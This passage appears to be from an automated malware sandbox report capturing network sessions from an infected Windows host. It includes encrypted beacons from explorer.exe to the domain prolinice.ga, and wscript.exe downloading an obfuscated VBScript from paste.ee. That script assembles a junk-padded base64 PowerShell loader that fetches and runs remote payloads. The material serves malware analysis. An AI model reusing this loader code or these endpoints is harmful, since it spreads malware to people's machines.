                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                  May 27, 2024 18:35:44.884079933 CEST1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                  May 27, 2024 18:35:44.889029026 CEST1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  12192.168.2.224917677.232.129.190801244C:\Windows\explorer.exe
                                  TimestampBytes transferredDirectionData
                                  May 27, 2024 18:36:08.149095058 CEST281OUTPOST /index.php HTTP/1.1
                                  Connection: Keep-Alive
                                  Content-Type: application/x-www-form-urlencoded
                                  Accept: */*
                                  Referer: http://aikpfjvjuwcsxfjs.net/
                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                  Content-Length: 275
                                  Host: prolinice.ga
                                  May 27, 2024 18:36:08.149127960 CEST275OUTData Raw: 6e e2 e2 fb b3 47 86 1f 61 1f b5 15 4b 5c fb f5 de 56 90 26 4f 89 ce ee 84 ea 7f 69 d6 48 32 04 32 c5 ea c3 7b da f7 a1 64 cf c4 f1 99 ac 30 26 e8 37 1e 48 8c 38 2e e3 36 d6 88 68 45 d7 76 e0 a7 fb bc 52 ee cc 59 3b 1f d6 b3 50 4c 85 65 c2 e2 ce
                                  Data Ascii: nGaK\V&OiH22{d0&7H8.6hEvRY;PLeepnai|c 5bKJM`D9&Z_;rWAh|qCoa|/zW;n)~QY-u`PLG/M \n~Y\[=G
                                  May 27, 2024 18:36:09.103879929 CEST1236INHTTP/1.1 404 Not Found
                                  Date: Mon, 27 May 2024 16:36:08 GMT
                                  Server: Apache/2.4.59 (Debian)
                                  Connection: close
                                  Transfer-Encoding: chunked
                                  Content-Type: text/html; charset=utf-8
                                  Data Raw: 35 32 64 38 38 0d 0a b9 00 00 00 a0 5f e8 0a 27 e8 d3 d3 81 21 79 b3 53 e5 35 0b ec 13 ad 26 44 90 de ef 3f 52 b4 a5 1d 0f 76 5e ee 37 a5 3a 38 64 25 38 a9 5e 19 de 43 7b 19 8a 78 2b e4 d1 73 bb 1b 96 f5 28 a6 be 4e 30 95 05 bc f7 23 ab 0f 0b 51 2a f5 2c 33 4d ed 17 40 1a 79 0c 2b 7b de 73 27 cf 50 68 9e 83 b3 e0 74 d2 13 5d fa 05 cb 86 bf 9a ff 99 b4 c1 53 49 97 f0 22 d3 3a b8 db 32 2e 28 81 82 51 ca 8d b4 0d 1e e5 5a f2 1c 1e 60 9d f8 6c ea 89 06 f0 fe 0b e0 be ed fc ac 8d 8d 20 19 bb ad d3 9e 70 c1 62 64 38 e6 ad f3 9c 8d b7 27 5d c1 30 78 b2 34 fc 64 ca 38 5b 03 cf 4b a0 90 08 00 ca 2c 05 00 7c e1 f7 57 09 03 02 00 09 00 9e 03 00 00 53 1f 7d 22 77 32 62 71 76 3f 4f 55 52 12 42 00 c9 32 ee 68 fe 0f ca 76 74 07 d6 d6 f9 b8 92 29 e8 55 92 92 3e c8 50 dd 24 a4 99 ce 5c 90 b9 3b fc 51 49 c0 0d f0 19 d3 e9 92 2a 7a f7 09 00 bb 7a b8 01 84 b7 a3 64 8b 0b f3 9f 79 57 fa 26 ce 46 fb 76 8c c7 a7 e0 22 d1 2d c9 1e 43 c3 ef c1 4c dd a0 af 3d b8 a8 a5 fb c0 70 8e 98 0e df 4b cc 40 42 f2 70 5e a2 6b 51 b2 9f [TRUNCATED]
                                  Data Ascii: 52d88_'!yS5&D?Rv^7:8d%8^C{x+s(N0#Q*,3M@y+{s'Pht]SI":2.(QZ`l pbd8']0x4d8[K,|WS}"w2bqv?OURB2hvt)U>P$\;QI*zzdyW&Fv"-CL=pK@Bp^kQfsjDk$+K*PPN2\WlT#6zbRKZ :D?UkKc'O?i@i3E| [}S2TqL L7@x!F*Ex{4@h;pg_Q@[N2*H%s;"r21LVRvo9bN|P,ds,^L+j m.&>g!=/r:l_U*kH >(OAO|q;@+o%Snnq nU[f&C5GT] T]>g{v[ySzB8IX<\r}23:=;HX>H+exij=Ou`'p3|JY=R^Xo[#kn^T-la@9>$z|kXv6]O8Rp|otzAY2u-jk75HwbEIrBG`yDvWR0md9n/o [TRUNCATED]
                                  May 27, 2024 18:36:09.103980064 CEST1236INData Raw: d0 7e ed e5 00 cd 59 0c 72 ff c8 4d 8a 9f 4d 22 6a 89 67 05 b3 b9 2f fa 37 ad b4 05 f0 4c 9c d2 83 fb c8 40 2b ca 87 d7 d8 99 59 38 07 be e8 b3 e1 23 2a af e7 50 60 c1 62 4e 47 09 99 34 01 6f 12 1a 46 5a dc 19 8a 32 8e 3a 4a 46 78 d9 bd c0 47 06
                                  Data Ascii: ~YrMM"jg/7L@+Y8#*P`bNG4oFZ2:JFxGcCl_\?+m6z3QU.yjlx`Z,8yO62nr~r)@l;i2,!a'MyPXN_k0aW,xqWbsevmBH,c:l%TM007#
                                  May 27, 2024 18:36:09.104016066 CEST1236INData Raw: 0b c3 87 e9 a2 e5 9c 55 17 aa d8 83 31 db 94 fd c2 b3 3f 55 5c 5f 9f 1e 7e 6b 4e a8 35 a7 e0 42 a5 09 24 43 66 a8 9a a3 42 93 39 9a 14 e7 d4 3b 8a a4 a2 eb 60 3a 8d 8e cb 46 35 1a 7d f4 ef 1b d7 93 ab 25 b8 e4 a0 82 b6 86 fd 09 d8 a2 56 03 b9 bb
                                  Data Ascii: U1?U\_~kN5B$CfB9;`:F5}%VRZ8po>f)%h>E(=+d~X{?|Ki06aKs=l?D7D;z6UM"iI"dioztH*{XgQlF}7u\C7:,#
                                  May 27, 2024 18:36:09.104079962 CEST672INData Raw: c8 44 aa c5 8e 2a 48 7b 58 6d b8 bd b5 19 24 5d 9b 9e c8 36 bb ab 0c dc df ea 85 53 6c af be 7d a0 6e 18 29 0f 59 52 49 76 a4 cc 87 01 d7 c4 07 89 48 4c 60 ef 84 a9 cc 3b 27 55 20 28 f5 e4 f0 78 5e 1c 8e b8 52 e9 61 ab 70 7a 85 27 8f 78 0d 7a ea
                                  Data Ascii: D*H{Xm$]6Sl}n)YRIvHL`;'U (x^Rapz'xzov:?8,eXO\[yb*b}Jp>0+;*8-hg=hYQIHI,%07?b{Kk'BS\kV#vBc)xB6jX`
                                  May 27, 2024 18:36:09.104130983 CEST1236INData Raw: 70 cf 1a 2d 33 2a 7d 8b 6e 60 43 b9 10 b7 99 ba c5 b9 e1 07 33 3a ab 49 a7 7f 0b b7 3f d0 e3 77 76 05 d4 49 4a 51 23 b0 7b 33 c9 fd 79 9a a6 18 e3 91 1b a0 6e 82 a5 b8 88 82 53 1c 14 4f 5b 01 31 e7 6d 82 e4 55 5b de a4 e2 46 ce 13 f0 19 82 6e e9
                                  Data Ascii: p-3*}n`C3:I?wvIJQ#{3ynSO[1mU[FnD5Gu]5I446Fdhj9Aw)-?Uu^qrP0>ZWPH{{X.Dbd<N;}cHI3},[>q]Sz2[
                                  May 27, 2024 18:36:09.104165077 CEST224INData Raw: a2 17 85 c4 e1 84 6d 81 ae a1 1a 16 35 7a 31 ad b3 b2 ba b3 37 b4 3b ac 60 4a d9 1b 1b 97 02 d6 f4 fc f4 0b d2 e6 4a 03 d0 99 7b 04 b0 bd 92 02 09 a0 2f a4 d1 95 3f a8 66 41 38 85 7f 99 76 d6 6a 2e fa 60 6a 44 6b 4a 3b 93 59 86 b6 3a 4b 30 37 5a
                                  Data Ascii: m5z17;`JJ{/?fA8vj.`jDkJ;Y:K07ZE_gnt;;-xs3~Fw0xXdw^D3~Q-]2(-OmwIKC+<ymmCx>sH
                                  May 27, 2024 18:36:09.104202986 CEST1236INData Raw: 0e d0 ce 58 e7 90 6f d5 86 12 6d fc 53 13 a8 c1 0a 8a af 89 df 66 25 35 10 34 1c 6d 7b 67 78 d5 80 d4 cd a3 f4 c9 4b 09 b2 8f c5 69 b3 e3 2e 68 db 5f 54 ac f4 4b ea f4 95 cf a6 e0 97 64 46 fa b2 4c 4e 19 30 04 78 43 d3 ff 6c 6e 19 40 99 27 48 d4
                                  Data Ascii: XomSf%54m{gxKi.h_TKdFLN0xCln@'Hq^o)h/dP,k}4K:VmBJ:Im;#OON {QK>:J*mD9Jwx23gk>7)$*YqPVpECH$H;\l=gK3c{R\Q
                                  May 27, 2024 18:36:09.104254961 CEST224INData Raw: 3e a7 ca e8 34 81 1a 91 ad a0 f5 38 b8 7c 5b 42 82 cf 5c f8 f3 8a 04 61 3a 4d dd dd 2d 80 40 2b 22 ee 6b 6f 17 fa dd b9 cf 0d 84 3f d4 e3 ff 65 86 bb 51 5d 2a 36 81 2d d3 fc 54 91 22 56 f9 f4 d4 62 b0 18 c9 6c 00 f4 c6 78 56 7e 7b 79 2f 4f e9 2f
                                  Data Ascii: >48|[B\a:M-@+"ko?eQ]*6-T"VblxV~{y/O/$@K+3i{5js&EfUF=vDN%n2 RC8GYNe?hj$T"sScdZl"[ff
                                  May 27, 2024 18:36:09.104289055 CEST1236INData Raw: 16 30 02 45 55 5a 28 71 df 03 a9 d5 a3 6e 6d 54 81 f9 01 96 b0 09 28 a6 03 2e d0 c3 6d 13 d9 81 41 46 15 0b ba f9 b3 7e 65 76 92 5d cc 1e ae a9 35 b4 41 50 5c 10 7a 7f 88 38 1a ab bb 21 b9 69 ca 04 6b ff b9 a2 96 71 4a eb 5b 56 13 2c 9e 54 5b 3f
                                  Data Ascii: 0EUZ(qnmT(.mAF~ev]5AP\z8!ikqJ[V,T[?>Jy;t!Oj}Hxq:?Ig(TW--^rL-m\HTXd.elx 9b71SmX~io"r~L&\@[
                                  May 27, 2024 18:36:09.104325056 CEST1236INData Raw: 3e d4 f9 b3 b7 95 fc d2 44 f5 2d db 0a e5 e9 86 70 da e1 4f 6b 80 17 d7 ab d4 a0 08 24 67 24 e3 fe c2 c7 f6 91 d7 cc 2d 16 83 7e af 9b 2b 47 23 a5 d8 d3 76 93 1d 90 c9 11 a9 a7 7d f7 ab 8c 62 8d c9 7e 36 f4 e0 89 2f 9e df 1f 76 3e 3b ef 65 26 1a
                                  Data Ascii: >D-pOk$g$-~+G#v}b~6/v>;e&HxtE8^L4,r2T5n9nD0Sk1%o[;Wch\Zty"n*_vUL*WvNzY&k:_@qfh)[\LMj8L


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  13192.168.2.224917777.232.129.190804072C:\Windows\SysWOW64\explorer.exe
                                  TimestampBytes transferredDirectionData
                                  May 27, 2024 18:36:17.026357889 CEST274OUTPOST /index.php HTTP/1.1
                                  Connection: Keep-Alive
                                  Content-Type: application/x-www-form-urlencoded
                                  Accept: */*
                                  Referer: http://prolinice.ga/
                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                  Content-Length: 1395
                                  Host: prolinice.ga
                                  May 27, 2024 18:36:17.026417971 CEST1395OUTData Raw: 6e e2 e2 fb b3 47 86 1f 61 1f b5 15 4b 5c fb f5 de 56 90 26 4f 89 ce ee 84 ea 7f 69 d6 48 32 04 32 c5 ea c3 7b da f7 a1 64 cf c4 b0 d5 ee 65 75 c5 67 5d 48 8c 38 2e e3 36 d6 88 68 45 d7 76 e0 a7 9a bd 52 eb cc 59 3b 1f d6 b2 50 4c 85 5d 82 f8 a2
                                  Data Ascii: nGaK\V&OiH22{deug]H8.6hEvRY;PL]Oc~k_!z1rJC\S7Wx*>x :xGresn*q~D%lu#RCIP6=I.:ua)i1b|Fz1zO!
                                  May 27, 2024 18:36:18.009824038 CEST584INHTTP/1.1 404 Not Found
                                  Date: Mon, 27 May 2024 16:36:17 GMT
                                  Server: Apache/2.4.59 (Debian)
                                  Content-Length: 409
                                  Connection: close
                                  Content-Type: text/html; charset=utf-8
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f [TRUNCATED]
                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.59 (Debian) Server at prolinice.ga Port 80</address></body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  0192.168.2.2249172188.114.96.34433420C:\Windows\SysWOW64\wscript.exe
                                  TimestampBytes transferredDirectionData
                                  2024-05-27 16:35:27 UTC302OUTGET /d/Bo3r4 HTTP/1.1
                                  Accept: */*
                                  Accept-Encoding: gzip, deflate
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                  Host: paste.ee
                                  Connection: Keep-Alive
                                  2024-05-27 16:35:27 UTC1230INHTTP/1.1 200 OK
                                  Date: Mon, 27 May 2024 16:35:27 GMT
                                  Content-Type: text/plain; charset=utf-8
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Cache-Control: max-age=2592000
                                  strict-transport-security: max-age=63072000
                                  x-frame-options: DENY
                                  x-content-type-options: nosniff
                                  x-xss-protection: 1; mode=block
                                  content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ti0r5ZVcpkJsyVUMB4IfxItc4lOtXNQ1ZXtxi3XL8kXZI3zG3OQXnvqv5y3nz8sxkGIHqWsgCDX8LzpctszFhQbVx9pyz95XWd6QjP%2FV7QigILIZpe9rg5KBMg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 88a76b10882941d3-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  2024-05-27 16:35:27 UTC139INData Raw: 31 66 37 66 0d 0a 0d 0a 20 20 20 20 20 64 69 6d 20 70 65 72 69 6f 64 69 63 61 6d 65 6e 74 65 20 2c 20 72 65 67 75 6c 61 64 6f 72 20 2c 20 64 65 73 76 69 72 67 69 6e 69 7a 61 72 20 2c 20 70 61 73 73 61 72 69 6e 68 61 20 2c 20 6d 75 73 74 65 6c 69 6e 6f 20 2c 20 43 61 6d 61 20 2c 20 6d 75 73 74 65 6c 69 6e 6f 31 0d 0a 20 20 20 20 20 72 65 67 75 6c 61 64 6f 72 20 3d 20 22 20 20 22 0d 0a 20 20 20 20 20 64 65 73 76 69
                                  Data Ascii: 1f7f dim periodicamente , regulador , desvirginizar , passarinha , mustelino , Cama , mustelino1 regulador = " " desvi
                                  2024-05-27 16:35:27 UTC1369INData Raw: 72 67 69 6e 69 7a 61 72 20 20 3d 20 22 22 20 26 20 70 61 73 73 61 72 69 6e 68 61 20 26 20 72 65 67 75 6c 61 64 6f 72 20 26 20 70 61 73 73 61 72 69 6e 68 61 20 26 20 22 67 42 31 44 67 54 72 65 47 34 44 67 54 72 65 59 77 42 30 44 67 54 72 65 47 6b 44 67 54 72 65 62 77 42 75 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 52 44 67 54 72 65 42 76 44 67 54 72 65 48 63 44 67 54 72 65 62 67 42 73 44 67 54 72 65 47 38 44 67 54 72 65 59 51 42 6b 44 67 54 72 65 45 51 44 67 54 72 65 59 51 42 30 44 67 54 72 65 47 45 44 67 54 72 65 52 67 42 79 44 67 54 72 65 47 38 44 67 54 72 65 62 51 42 4d 44 67 54 72 65 47 6b 44 67 54 72 65 62 67 42 72 44 67 54 72 65 48 4d 44 67 54 72 65 49 44 67 54 72 65 42 37 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 63 44 67 54 72 65 42 68
                                  Data Ascii: rginizar = "" & passarinha & regulador & passarinha & "gB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBh
                                  2024-05-27 16:35:27 UTC1369INData Raw: 72 65 42 38 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 52 77 42 6c 44 67 54 72 65 48 51 44 67 54 72 65 4c 51 42 53 44 67 54 72 65 47 45 44 67 54 72 65 62 67 42 6b 44 67 54 72 65 47 38 44 67 54 72 65 62 51 44 67 54 72 65 67 44 67 54 72 65 43 30 44 67 54 72 65 51 77 42 76 44 67 54 72 65 48 55 44 67 54 72 65 62 67 42 30 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4a 44 67 54 72 65 42 73 44 67 54 72 65 47 6b 44 67 54 72 65 62 67 42 72 44 67 54 72 65 48 4d 44 67 54 72 65 4c 67 42 4d 44 67 54 72 65 47 55 44 67 54 72 65 62 67 42 6e 44 67 54 72 65 48 51 44 67 54 72 65 61 44 67 54 72 65 44 67 54 72 65 37 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 22 20 26 20 70 61 73 73 61 72 69 6e 68 61 20 26 20 72 65 67 75 6c 61 64 6f 72 20 26 20 70 61 73 73 61 72
                                  Data Ascii: reB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTre" & passarinha & regulador & passar
                                  2024-05-27 16:35:27 UTC1369INData Raw: 72 65 6b 44 67 54 72 65 47 77 44 67 54 72 65 61 51 42 75 44 67 54 72 65 47 73 44 67 54 72 65 63 77 44 67 54 72 65 67 44 67 54 72 65 44 30 44 67 54 72 65 49 44 67 54 72 65 42 44 67 54 72 65 44 67 54 72 65 43 67 44 67 54 72 65 4a 77 42 6f 44 67 54 72 65 48 51 44 67 54 72 65 64 44 67 54 72 65 42 77 44 67 54 72 65 48 4d 44 67 54 72 65 4f 67 44 67 54 72 65 76 44 67 54 72 65 43 38 44 67 54 72 65 64 51 42 77 44 67 54 72 65 47 77 44 67 54 72 65 62 77 42 68 44 67 54 72 65 47 51 44 67 54 72 65 22 20 26 20 70 61 73 73 61 72 69 6e 68 61 20 26 20 72 65 67 75 6c 61 64 6f 72 20 26 20 70 61 73 73 61 72 69 6e 68 61 20 26 20 22 44 67 54 72 65 42 6c 44 67 54 72 65 47 6b 44 67 54 72 65 62 51 42 68 44 67 54 72 65 47 63 44 67 54 72 65 22 20 26 20 70 61 73 73 61 72 69 6e 68 61
                                  Data Ascii: rekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTre" & passarinha & regulador & passarinha & "DgTreBlDgTreGkDgTrebQBhDgTreGcDgTre" & passarinha
                                  2024-05-27 16:35:27 UTC1369INData Raw: 65 47 30 44 67 54 72 65 59 51 42 6e 44 67 54 72 65 47 55 44 67 54 72 65 4c 67 42 71 44 67 54 72 65 48 44 67 54 72 65 44 67 54 72 65 22 20 26 20 70 61 73 73 61 72 69 6e 68 61 20 26 20 72 65 67 75 6c 61 64 6f 72 20 26 20 70 61 73 73 61 72 69 6e 68 61 20 26 20 22 77 44 67 54 72 65 2f 44 67 54 72 65 44 45 44 67 54 72 65 4e 77 44 67 54 72 65 78 44 67 54 72 65 44 59 44 67 54 72 65 4d 77 44 67 54 72 65 77 44 67 54 72 65 44 63 44 67 54 72 65 4e 67 44 67 54 72 65 7a 44 67 54 72 65 44 51 44 67 54 72 65 4a 77 44 67 54 72 65 70 44 67 54 72 65 44 73 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 6b 44 67 54 72 65 47 6b 44 67 54 72 65 62 51 42 68 44 67 54 72 65 47 63 44 67 54 72 65 22 20 26 20 70 61 73 73 61 72 69 6e 68 61 20 26 20 72 65 67 75 6c 61 64 6f 72 20 26 20
                                  Data Ascii: eG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTre" & passarinha & regulador & passarinha & "wDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTre" & passarinha & regulador &
                                  2024-05-27 16:35:27 UTC1369INData Raw: 7a 44 67 54 72 65 43 6b 44 67 54 72 65 4f 77 44 67 54 72 65 67 44 67 54 72 65 43 51 44 67 54 72 65 63 77 42 30 44 67 54 72 65 47 45 44 67 54 72 65 63 67 42 30 44 67 54 72 65 45 59 44 67 54 72 65 62 44 67 54 72 65 42 68 44 67 54 72 65 47 63 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 39 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4a 77 44 67 54 72 65 38 44 67 54 72 65 44 77 44 67 54 72 65 51 67 42 42 44 67 54 72 65 46 4d 44 67 54 72 65 52 51 44 67 54 72 65 32 44 67 54 72 65 44 51 44 67 54 72 65 58 77 42 54 44 67 54 72 65 46 51 44 67 54 72 65 51 51 42 53 44 67 54 72 65 46 51 44 67 54 72 65 50 67 44 67 54 72 65 2b 44 67 54 72 65 43 63 44 67 54 72 65 4f 77 44 67 54 72 65 67 44 67 54 72 65 43 51 44 67 54 72 65 22 20 26 20 70 61 73 73 61 72 69 6e 68 61
                                  Data Ascii: zDgTreCkDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTre" & passarinha
                                  2024-05-27 16:35:27 UTC1087INData Raw: 73 73 61 72 69 6e 68 61 20 26 20 72 65 67 75 6c 61 64 6f 72 20 26 20 70 61 73 73 61 72 69 6e 68 61 20 26 20 22 67 44 67 54 72 65 67 44 67 54 72 65 43 67 44 67 54 72 65 4a 44 67 54 72 65 42 7a 44 67 54 72 65 48 51 44 67 54 72 65 59 51 42 79 44 67 54 72 65 48 51 44 67 54 72 65 53 51 42 75 44 67 54 72 65 47 51 44 67 54 72 65 22 20 26 20 70 61 73 73 61 72 69 6e 68 61 20 26 20 72 65 67 75 6c 61 64 6f 72 20 26 20 70 61 73 73 61 72 69 6e 68 61 20 26 20 22 51 42 34 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4c 51 42 6e 44 67 54 72 65 47 55 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 77 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4c 51 42 68 44 67 54 72 65 47 34 44 67 54 72 65 22 20 26 20 70 61 73 73 61 72 69 6e 68 61 20 26 20 72 65 67 75 6c 61 64 6f
                                  Data Ascii: ssarinha & regulador & passarinha & "gDgTregDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTre" & passarinha & regulador & passarinha & "QB4DgTreCDgTreDgTreLQBnDgTreGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTre" & passarinha & regulado
                                  2024-05-27 16:35:27 UTC1369INData Raw: 31 36 38 38 0d 0a 67 54 72 65 39 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4a 44 67 54 72 65 42 6c 44 67 54 72 65 47 34 44 67 54 72 65 22 20 26 20 70 61 73 73 61 72 69 6e 68 61 20 26 20 72 65 67 75 6c 61 64 6f 72 20 26 20 70 61 73 73 61 72 69 6e 68 61 20 26 20 22 44 67 54 72 65 42 4a 44 67 54 72 65 47 34 44 67 54 72 65 22 20 26 20 70 61 73 73 61 72 69 6e 68 61 20 26 20 72 65 67 75 6c 61 64 6f 72 20 26 20 70 61 73 73 61 72 69 6e 68 61 20 26 20 22 44 67 54 72 65 42 6c 44 67 54 72 65 48 67 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 74 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4a 44 67 54 72 65 42 7a 44 67 54 72 65 48 51 44 67 54 72 65 59 51 42 79 44 67 54 72 65 48 51 44 67 54 72 65 53 51 42 75 44 67 54 72 65 47 51 44 67 54 72 65 22 20 26 20
                                  Data Ascii: 1688gTre9DgTreCDgTreDgTreJDgTreBlDgTreG4DgTre" & passarinha & regulador & passarinha & "DgTreBJDgTreG4DgTre" & passarinha & regulador & passarinha & "DgTreBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTre" &
